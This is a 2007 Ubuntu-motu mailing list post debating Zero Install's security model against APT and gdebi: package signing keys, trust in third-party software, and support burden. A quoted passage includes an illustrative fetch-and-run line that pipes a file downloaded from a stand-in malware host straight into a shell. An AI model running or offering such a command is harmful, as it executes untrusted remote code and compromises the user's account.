On Wed, 10 Jan 2007 15:21:45 +0100, Reinhard Tartler wrote:
> "Thomas Leonard" <[EMAIL PROTECTED]> writes:
[...]
>> - Type:
>> $ wget malware.com/malware -O -|sh
>> Result: User account compromised.
[...]
> Red Carpet? Yes, I've seen something like that.
That wasn't the one I was thinking of, but I imagine there are plenty of
people doing the same thing.
> Still, I wouldn't
> recommend running arbitrary 3rd party shell scripts as root (or as any
> user) on users machines. Perhaps in qemu for testing or something ;)
So Ubuntu isn't against the idea of users being able to run any software,
just the idea of them running programs with limited security protection?
(run-in-VM OK, run-as-user not OK, yes?)
So full virtualisation is one option there, but it's massively inefficient
to install every program and its dependencies in a different VM (think how
many copies of GTK you'd need ;-)
Zero Install's goal is to make installation 'safe' (installing
arbitrary or malicious packages won't harm your system). Running them is
another matter, and that's where a good sandbox comes in (e.g. plash, etc).
It's really difficult to do this kind of thing with APT, because it
installs files to shared directories ('bin', etc) and runs scripts inside
the packages ('preinst', etc). How could you write a security policy for
APT that let you install software without risking the system? Zero Install
lets you do this.
In other words, Zero Install isn't a complete security system, but it's a
necessary part of a solution.
>>> Where do these 'known' keys come from? Who authorizes these keys?
>>
>> Currently, people post them to a public mailing list and I add them.
>> Here's a screenshot showing a typical dialog:
>>
>> http://0install.net/trustbox.png
>>
>> If universe has stricter checks, we could use that keyring too for the
>> hints ("This key is approved by MOTU" / "MOTU has not approved this key -
>> USE AT OWN RISK!").
>
> There is only ONE archive key. Only authorized developers can upload to
> our archive.
I think Debian has the same system. Essentially, an attacker can either
compromise the archive key OR any developer's key (since the archive
key will sign any upload from a developer).
I guess it also means that all users have to trust all developers, even
those whose software they don't use?
I was thinking more about the keyring that decides who can upload. If
someone is authorised to upload packages to Ubuntu, then I'd feel a lot
happier about using their programs.
> As for 3rd party repositories, we don't have adequate
> support for verifying gpg keys. (something which I think could need
> improvement, but anyway).
Of course, this is always the most difficult area of security, and who
wants to do the verification work? Still, knowing that someone has been
signing software for years with a certain key without any reports of bad
behavious is a start.
> This is a bit different to 0install, where it
> seems that random upstream/malware authors sign their software, and the
> user has to accept that key like you show in the screenshot. The dialog
> however doesn't offer any support for validation of the key. Do you
> perhaps require these keys are signed by an 'authorization key'? or
> offer some path finding tool to find 'trust paths'? You see, validating
> keys is a quite difficult problem. One reason why there is only one
> archive key in ubuntu.
Having one master key that blindly signs anything sent to it by
an authorised person doesn't seem to solve the problem. How do you
decide which keys are trusted by the program with the master key?
Ultimately, we both have a list of developer keys we trust to some extent
(you trust all of them fully on behalf of your users, we just note that
we've seen them before on a public list). As I say, I'm happy to believe
that Ubuntu performs better checks than I do, and I'd be happy to use your
list. But you must have a list, somewhere.
>> Do Ubuntu users really need to be "authorised" by you to run software
>> on their own computers?
>
> No, we don't require this. However, we promise support for all software
> which is signed by us. If we would include 0install, we would promise to
> support the 0install installer.
>
> My concern here is now that users could understand the inclusion of the
> 0install installer would mean that all software which is installable by
> 0install is supported as well. Something we cannot sensibly do.
Actually, users already think Ubuntu promises to support Zero Install.
(Proof: Download the zeroinstall .deb and open it. Ubuntu offers to install
it using gdebi, a supported tool supplied with Ubuntu.)
In fact, gdebi happily tells the user that the program is written by
"Thomas Leonard", without any proof of this at all! There is no warning
about installing 3rd-party software or unknown keys.
So, I'm trying to understand what Ubuntu's policy is.
- Is it acceptable to let the user install any software package they
find with minimal or no warning from anywhere on the web?
If not, will gdebi be removed from the distribution? If so, how can this
be used as an argument against Zero Install?
>>> I fear that we'll get bugreports from 3rd party software by users, who
>>> have installed random software via 0install, and that we will not be
>>> able to support them.
>>
>> That's true. How do you deal with this problem with Firefox extensions,
>> Python distutil modules, modified sources.list files and similar?
>
> Good point. Partly we do get bugreports about them (mostly misfiled),
> but in most cases, we have to answer users that we cannot support
> them. I don't want to repeat this misery with 0install.
Compilation failures offer to send the bug report back to us already, but
currently we don't trap runtime bugs. Perhaps there's some hint we can
provide for bug-buddy to let it know where to send things (though I realise
that handling crashes doesn't cover all cases).
> I think that if you find a developer, who promises to care for 0install,
> and the ftp-masters of ubuntu don't object, we could include
> 0install. But as you already have read in other posts, there are some
> anti-sentiments against automatix, autopackage and similar projects among
> ubuntu developers. 0install seems in many ways quite similar to them and
> seems to have similar problems.
OK, but I'd like to have a discussion about it first if other developers
are unhappy. I'd like to think that Zero Install is at least as secure as
your existing gdebi, and hopefully somewhat better, so if I've missed
something please let me know.
--
Dr Thomas Leonard http://rox.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1
--
Ubuntu-motu mailing list
[email protected]
Modify settings or unsubscribe at:
https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
